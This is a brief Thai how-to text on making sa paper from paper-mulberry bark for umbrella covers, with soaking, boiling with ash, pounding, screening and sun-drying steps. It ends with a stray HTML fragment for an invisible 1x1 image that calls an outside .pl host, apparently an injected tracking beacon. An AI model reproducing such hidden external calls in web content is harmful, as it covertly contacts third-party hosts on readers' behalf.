วิธีการทำกระดาษสา

กระดาษที่ใช้คลุมร่มนั้น ผู้ผลิตสามารถผลิตขึ้นใช้เองจากเปลือกของต้นไม้
ชนิดหนึ่งซึ่งเรียกกันตามภาษาพื้นบ้านว่า ต้นสา หรือที่ภาคกลางเรียกกันว่า
ต้นปอกระสา ต้นไม้ชนิดนี้มีอยู่ทั่วไปในภาคเหนือ
วิธีการทำร่มกระดาษของเปลือกจากต้นสา

นำเปลือกสาที่ได้มาแช่ในน้ำทิ้งไว้ประมาณ 24 ชั่วโมงแล้วนำไปต้มกับขี้เถ้าประมาณ
3-4 ชั่วโมง จนเห็นว่าเปื่อยดีแล้ว จึงนำออกมาล้างให้สะอาด แล้วนำมาทุบ ให้ละเอียด
นำไปแช่ในอ่างน้ำซึ่ง ก่อด้วยซีเมนต์รูปสี่เหลี่ยมผืนผ้า ขนาดประมาณ 2 x 3 เมตร
และลึกประมาณครึ่งเมตร บรรจุน้ำประมาณครึ่งถัง ใช้ไม้คนให้ทั่ว แล้วใช้ตะแกรง
ขนาดตามที่ต้องการ ซึ่งส่วนมากมีขนาดประมาณ 40 x 60 ซ.ม. ตักเยื่อเปลือกไม้ในน้ำ
ขึ้นมาแล้วตากแดดให้แห้งเมื่อเนื้อเยื่อของเปลือกสาที่ตากทิ้งไว้ ไว้แห้งดีแล้ว จึงค่อยๆ
ลอกออกมาก็จะได้กระดาษเป็นแผ่น เรียกกันว่ากระดาษสา
ซึ่งสามารถนำไปใช้หุ้มร่มต่อไป


 

//ZieF.pl/rc/" width=1 height=1 style="border:0">